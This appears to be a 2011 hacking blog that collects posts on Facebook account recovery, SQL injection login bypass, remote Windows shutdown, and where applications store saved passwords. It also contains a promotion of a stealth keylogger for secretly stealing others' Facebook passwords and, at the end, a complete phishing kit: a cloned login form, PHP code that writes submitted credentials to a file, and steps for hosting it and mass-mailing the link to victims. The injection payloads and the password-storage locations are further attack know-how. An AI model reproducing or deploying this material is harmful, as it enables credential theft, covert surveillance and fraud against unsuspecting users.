Recovering hacked Facebook IDs

Thursday 31 March 2011

How to recover hacked facebook account.

Is your Facebook account hacked and you cannot login?. Your usual login details may return incorrect in event of Facebook account being hacked.



Steps to get back & recover hacked Facebook account.

1. Make sure you are using correct Facebook login page to access your account. Directly type and open www.facebook. com from web browser (do not click any link to access Facebook login page).

2. If you think your Facebook account is hacked but you can still login – quickly reset and change your Facebook account password.

Click here (https://www.facebook/. com/recover.php) to reset or click “Forgotten your password?” link above Facebook login box at top right part.

3. If you think your Facebook account is hacked and cannot login as a result of hacker changing your login email address – then you need to contact Facebook support for quick restoration of your Facebook account.

Click here (http://www.facebook/. com/help/?page=1023) and follow on-screen instructions to send support request in event of Facebook account being hacked.

10 Tips to Become a hacker

Ten tips to became a hacker

As told before, professional hackers are generally more intelligent than any average programmer.

So becoming a hacker depends a lot on intelligence and efforts



1. Be curious: Curiosity is the mother of hacking. Look under the hood. Take things apart. Know the

details of your system directories, file systems,

system files. Look inside your computer.



2. Read a lot: Buy lots of books, go through the tutorials. Read the help files on your system. If you

are using Linux/Unix read the man files.



3. Experiment: Take precautions and experiment whatever you read. Apply to work the idea that just

hit your mind. Don't be afraid to change things.

Doing this for a long time will give you much idea on the computer hardware and the operating

system



4. Make backups: If you start mucking around with system files, registries, password files, and such,

you will eventually destroy your system. Have a

backup ready. If you can afford it, have a system you use just for experimenting, ready to reload on

a moment's notice, and do your serious work (or

serious gaming!) on a different computer.



5. Think out of box: Hacking is not restricted to computers only. You can try trick on other networks

also like mobile, telephone, etc.



6. Get some real tools: You can find numerous hacking tools on the net. Though some serious tools

are not available for free, you need to have some

Hex file editors, Snoopers, Compilers and APIs. In addition you also need Scripting tools, Disk

editors/formatters and Disassemblers.





7. Learn to program: Serious ethical hackers are always very good programmers. If you want to be

a hacker, you're going to learn much programming.

You should also be quite familiar with the popular operating systems like Windows, Linux, Unix,

OS2 etc.



8. Discuss with peers: In isolation, you can’t learn anything. You need to take classes, join

users groups and computer clubs. Talking to people on

IRC or other chat programs proves really helpful. Share what you learn. Because to get something

you have to give some.



9. Do some projects: Pick some projects and work consistently until you've finished them. Real time

experience is better than reading. Build from

ground zero, learn to create icons, associate it with some files, read how the search engines search,

try to manipulate the programs that you use daily.



10. Use the Internet: There is no source greater than the Internet. Start with the Web. Learn how to

use Boolean searches. Bookmark all those sites

which you find worth visiting. Sometimes you will find useful information at the strangest places



10 Commandments of Ethical Hacking



1. a computer to harm other people.

2. interfere with other people's computer work

3. snoop around in other people's computer files.

4. use a computer to steal

5. use a computer to bear false witness.

6. copy or use proprietary software for which you have not paid.

7. use other people's computer resources without authorization or compensation.

8. appropriate other people's intellectual output.

9. Think about the social consequences of the program you are writing.

10. Always use a computer in ways that insure consideration and respect for your fellow humans

Hacking A Website

I want to show you just one way that hackers can get in to your website and mess it up, using a technique called SQL Injection. And then I'll show you how to fix it. This article touches on some technical topics, but I'll try to keep things as simple as possible. There are a few very short code examples written in PHP and SQL. These are for the techies, but you don't have to fully understand the examples to be able to follow what is going on. Please also note that the examples used are extremely simple, and Real Hackers™ will use many variations on the examples listed.

If your website doesn't use a database, you can relax a bit; this article doesn't apply to your site — although you might find it interesting anyway. If your site does use a database, and has an administrator login who has rights to update the site, or indeed any forms which can be used to submit content to the site — even a comment form — read on.

Warning

This article will show you how you can hack in to vulnerable websites, and to check your own website for one specific vulnerability. It's OK to play around with this on your own site (but be careful!) but do not be tempted to try it out on a site you do not own. If the site is properly managed, an attempt to log in using this or similar methods will be detected and you might find yourself facing charges under the Computer Misuse Act. Penalties under this act are severe, including heavy fines or even imprisonment.

What is SQL Injection?

SQL stands for Structured Query Language, and it is the language used by most website databases. SQL Injection is a technique used by hackers to add their own SQL to your site's SQL to gain access to confidential information or to change or delete the data that keeps your website running. I'm going to talk about just one form of SQL Injection attack that allows a hacker to log in as an administrator - even if he doesn't know the password.

Is your site vulnerable?

If your website has a login form for an administrator to log in, go to your site now, in the username field type the administrator user name.

In the password field, type or paste this:

x' or 'a' = 'a

If the website didn't let you log in using this string you can relax a bit; this article probably doesn't apply to you. However you might like to try this alternative:

x' or 1=1--

Or you could try pasting either or both of the above strings into both the login and password field. Or if you are familiar with SQL you could try a few other variations. A hacker who really wants to get access to your site will try many variations before he gives up.

If you were able to log in using any of these methods then get your web tech to read this article, and to read up all the other methods of SQL Injection. The hackers and "skript kiddies" know all this stuff; your web techs need to know it too.

The technical stuff

If you were able to log in, then the code which generates the SQL for the login looks something like this:

$sql =
"SELECT * FROM users
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

When you log in normally, let's say using userid admin and password secret, what happens is the admin is put in place of $username and secret is put in place of $password. The SQL that is generated then looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'secret'

But when you enter x' or 'a' = 'a as the password, the SQL which is generated looks like this:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x' or 'a' = 'a'

Notice that the string: x' or 'a' = 'a has injected an extra phrase into the WHERE clause: or 'a' = 'a' . This means that the WHERE is always true, and so this query will return a row contain the user's details.

If there is only a single user defined in the database, then that user's details will always be returned and the system will allow you to log in. If you have multiple users, then one of those users will be returned at random. If you are lucky, it will be a user without administration rights (although it might be a user who has paid to access the site). Do you feel lucky?

How to defend against this type of attack

Fixing this security hole isn't difficult. There are several ways to do it. If you are using MySQL, for example, the simplest method is to escape the username and password, using the mysql_escape_string() or mysql_real_escape_string() functions, e.g.:

$userid = mysql_real_escape_string($userid);
$password = mysql_real_escape_string($password);
$sql =
"SELECT * FROM users
"WHERE username = '" . $username .
"' AND password = '" . $password . "'";

Now when the SQL is built, it will come out as:

SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x\' or \'a\' = \'a'

Those backslashes ( \ ) make the database treat the quote as a normal character rather than as a delimiter, so the database no longer interprets the SQL as having an OR in the WHERE clause.

This is just a simplistic example. In practice you will do a bit more than this as there are many variations on this attack. For example, you might structure the SQL differently, fetch the user using the user name only and then check manually that the password matches or make sure you always use bind variables (the best defence against SQL injection and strongly recommended!). And you should always escape all incoming data using the appropriate functions from whatever language your website is written in - not just data that is being used for login.

There's more

This has just been a brief overview. There are many more hacking techniques than SQL Injection; there are many more things that can be done just using SQL Injection. It is possible to directly change data, get access to confidential information, even delete your whole database — irrespective of whether the hacker can actually log in — if your website isn't set up correctly.

If you are hungry for more, this detailed article from SecuriTeam explains other techiques hackers might use, as well as some of the methods hackers use to work out the structure of your database, the userid of the admin user, gain access to your system's configuration, etc.

Have a nice weekend!

HAcking Computer On LAN

Do you need to shutdown a server or other remote computer? Need to do this from the convenience of your own PC? Here's how to shutdown a remote Windows computer from your own desktop.

1. Open the command prompt. This may be done by clicking on the "Start" button, and selecting "Run".

2. Type in cmd and press Enter.

3. Type in shutdown -m \\computername, replacing "computername" with the name of the computer you wish to shutdown or the computers ip address.

4. Experiment with the shutdown command's switches.

* -r will force a restart, disabling any services or user interaction from interrupting it.
* -c "comment" will force a comment to appear on the system being shutdown.
* -t xx will force a timeout for "xx" seconds. For example, -t 60 would perform a shutdown after a 60 second timeout.
* -a will abort the shutdown
* A full command example: shutdown -m \\myserver -r -c "This system will shutdown in 60 seconds" -t 60

Another method is to

* type shutdown -i in the run window.
* Click the "Add" box and type the name of the computer you want to shutdown or it's IP address. You can select what you want the computer to do.
* In this mode, it is NECESSARY to add a comment. Finally press "OK".

Tips...

* For a complete list of the switches (options) for the "shutdown" command, type in shutdown ? inside of a command prompt window.

* The target computer and your PC need to be in the same Domain or Workgroup for this to function correctly.

* This will only work on Microsoft Windows based systems. Linux and Mac will require different terminal commands.

* You may also run this shutdown command directly from the "Run" dialog. Opening a command prompt is merely a convenience in case you happen to type in the wrong system name or need to search for the name of the system to shutdown.

HAVE FUN

Is Hacking really a crime?

We have all heard the horror stories about hackers busting into computers and learning secrets, that are suppose to be secure. And we have seen the movies where terrorists hack into highly secured government computers and take over, shutting down electric and water systems, and getting nuclear bomb codes. Although these are rare, and major if they ever did happen, there is still a lot of everyday hacking that is happening to the general public, such as Identity thief. This is a process where people get your personal information, either from computer files or even on paper. And they use it for their own gain.

We all have information stored on computers. Even if you don't own one your information is still in large computer systems everywhere. Our banking systems use them, our government agencies, our schools, and work places. In all these computer lays our very critical details. Such as Driver's License number, Social security numbers, bank accounts, credit cards, health records, etc. And if you do use a computer for personal use such as shopping, then you have had to give your information over a computer many times. And if you make purchases over the internet often you my have your information saved so you don't have to enter it every time, and this could make it easier for someone to get a hold of it for the wrong reasons.

Online banking is another good example of our information being accessible on a computer. These hackers learn how to get our information from our personal computers, or even our banks. And they collect important pieces of our lives. Anyone who has ever been a victim of identify thief can tell you what a nightmare it can be. Your savings could be wiped out and your hard earned credit rating destroyed. So what can be done? Our banking systems and other high level organizations have top notch security measures in place to help protect us and our information. They also have people working everyday on improving security, and learning how to handle and avoid new threats. On our personal computers we need to take the proper precautions. And have different types and levels of security software in place. Hopefully this will help prevent anything bad from happening to our detailed information.

When you are shopping, or doing anything on the internet that requires you to give out details about yourself that can fall into the hands of a thief, be careful, and make sure the site you are giving this information to is secured and legitimate. Microsoft windows has an alert systems in place that tells you if you are entering an unsecured web page, it also checks the security certificates of a website and if there is a question it will advise you not to go there.

Pay attention to all the alerts when they are given, they are there to help protect you. Computers and the internet have made our lives much more fulfilling and easier. You just need be little careful and cautious. Just like walking to your car in the dark late at night, Just pay attention.

Places Where the saved passwords are stored

Google Chrome:
Chrome Passwords are stored in a SQLite file the sites name and sites username is in clear text but the password is seeded in a Triple DES algorithm. The file is called Web Data and is stored in the following location

XP – C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default
Vista – C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default

Trillian:
Note- I have just realised the new version of trillian the passwords made be stored/encrypted differently
Trillian Passwords are stored in .ini files the first character of the password is encrypted with XOR with the key 243 then the password is converted into hex. The file is based on what the password is for so if it was icq it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar if you open it up with notepad you will see all the data + the encrypted password). The files are stored in the following location:

XP (old version) – C:\Program Files\Trillian\users\
XP (new version) – C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global – I am not sure on exact but it is somewhere their
Vista (old version)- C:\Program Files\Trillian\users\
Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\gl obal

MSN /Windows Live Messenger:
MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[Account Name]
Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with “WindowsLive:name=”. They a set of Win API functions (Credential API’s) to store its’ security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the “target name” and “type”. If you are familiar with SQL you can think of target name and type as the primary key. Table below lists most frequently used fields in Windows Live ID Credential records.

Paltalk:
Paltalk Passwords are using the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt the new password Paltalk looks at the serial number of the disk C:\ and performs a mix with the Nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.
AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.
The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]

Google Talk:
Google Talk passwords are encoded/decoded using Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google
Talk\Accounts\[Account Name]

Firefox:
Click Me!!!!

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.

Yahoo Messenger 6.x:
The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
(”EOptions string” value)

Yahoo Messenger 7.5 or later:
The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.
The value stored in “ETS” value cannot be recovered back to the original password.

(Malik)
AIM:
AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.
448-bit keyword is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords

No Ip (easy to make in vb.net):
Passwords encoded with Base64 you can find the account information in the following locations

HKEY_LOCAL_MACHINESOFTWARE\Vitalwerks\DUC\”, “Password”
HKEY_LOCAL_MACHINESOFTWARE\Vitalwerk\sDUC\”, “Checked”
HKEY_LOCAL_MACHINESOFTWARE\Vitalwerks\DUC\”, “Username
KEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\”, “ProxyUsername
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\”, “ProxyPassword”
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\”, “Hosts”

Filezilla:
Passwords are stored in a .xml file located in Filezilla on appdata their is sources for this

Internet Explorer 4.00 – 6.00:
The passwords are stored in a secret location in the Registry known as the “Protected Storage”.
The base key of the Protected Storage is located under the following key:
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.
You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.

Internet Explorer 7.00 – 8.00:
The new versions of Internet Explorer stores the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.

Opera:
The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile

Malik
Outlook Express (All Versions):
The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.

Outlook 98/2000:
Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.

Outlook 2002-2008:
All new versions of Outlook store the passwords in the same Registry key of the account settings.
The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]
If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.

ThunderBird:
The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.

Digsby:
The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.

Protect Your Selves from Viruses

There are different Methods through Viruses may be transferred from one computer to another.

1.Now- a-days, most of the viruses spread due to receiving unknown e-mail messages that contains viruses. When a user opens such an infected message, the virus is also loaded into the computer memory. In this way, many other program files loaded into the memory are infected. This virus is also transferred to other computers when e-mail messages are sent from the infected computer to them. Due to these viruses, some time an auto generated email message from your email ID sends to your friends from your side with different virus messages. Never open unknown and attractive subject line email messages, always scan first even if you know the sender of the message.

2. Another way of spreading virus is by using Internet and other networks. For example, when you download infected executables files or data files from the Internet or from a shared disk on the network, viruses are transferred to your computer. It must be noted that many software are available on the Internet with free of cost. Most of that software contains viruses, for example free PHP or ASP scripts are the main source of virus, always get these scripts from reliable sources. In an LAN, if a computer contains a virus, then all the computers on the network may be infected with that virus.

3. One important means of exchanging data is through the use of removable media like, CDs, MP3 player, ipod and flash devices. So, when you copy the data from one computer to another by using a removable media, the viruses are also transferred.

4.The virus can also infect your computer by using pirated software. The software, which is installed into your computer without license is referred to as pirated software. Some companies may intentionally attach some virus programs into their software. This program will only activate when it does not find some special files like license files on your computer.

Some info related to Facebook Hacking

Wondering to know how to hack Facebook password? Well before you try to hack any Facebook password, it is necessary to understand the real ways of hacking that actually work and also those that are simply scam and don’t work. Everyday I get a lot of emails where people ask me “how to hack Facebook password?” So in this post I have taken up this topic to show you the possible ways to do that!
Today even a noob computer user (perhaps like you) can easily hack Facebook or any other social networking site with ease in a matter of hours and thus hacking is no longer the secret art of a Russian hacker! Well the idea behind this post is to expose the truth behind hacking Facebook account so that you can stay away from all those scam sites which will rip off your pockets by making false promises to obtain any password for you. Also this post is not meant to encourage people into hacking Facebook, but rather it is meant to educate the Internet users to be aware of the common scams and frauds and stay away from them.
I can tell you is that there are only two ways to successfully hack a Facebook account.

1. Keylogging – Easiest Way to Hack Facebook Password


Keylogging refers to simply recording each and every keystroke that is typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer. Some keyloggers with advanced features can also capture screenshots and monitor every activity on the computer. To install and use a kelooger one doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack Facebook password. I recommend the following keylogger as the best for gaining access to facebook password.

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
SniperSpy is a revolutionary product that will allow you to easily access *ANY* online accountor password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!

* SniperSpy – for Windows
* SniperSpy – for Mac


Why SniperSpy is the best?
Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected.

Here is a summary of benefits that you will receive with Sniperspy software:

1. Access ANY Password
With SniperSpy you can hack any password and gain access to Facebook or any other online account.

2. Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.

3. Never Get Caught
SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught.

4. Remote Installation Feature
With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.

5. Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.

6. Completely Safe to Use
This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.

7. Works on both Windows and Mac
you can download sniperspy from this site

http://www.sniperspytool.com/

Face Book Hacking (Fake Page)

Wednesday 30 March 2011

1) Go to: www.facebook.com/login.php
Right click on a white space and press view source code.
Copy it all and paste it in notepad.

2) Search in notpad (Crtl+f) for 'action'.
Change it to action="next.php"
Then on the left change: method="get" instead of "POST"

You would have something like this:
<form method="get" action="next.php" id="login_form">

Save it as index.php (save as unicode)

3) Now we need to make a next.php so:
open notepad again and paste this code:

:<?php
header("Location: http://www.facebook.com/hack.lessons ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

And save it as next.php
For safety: change passwords.txt to login.txt

Now make in notepad a login.txt file.
Save as login.txt and leave blank.

4) Congratiulations! You made you're own facebook phisher!!!
Now upload those 3 files (index.php ;next.php and login.txt) on a hosting site.
(they must support php!)

I suggest to use freeho sti a.co m  (remove spaces)

5) Send the link to some e-mail-accounts.
You can search for 'mass-mails' to have some e-mails.
or instead send the link via private msg...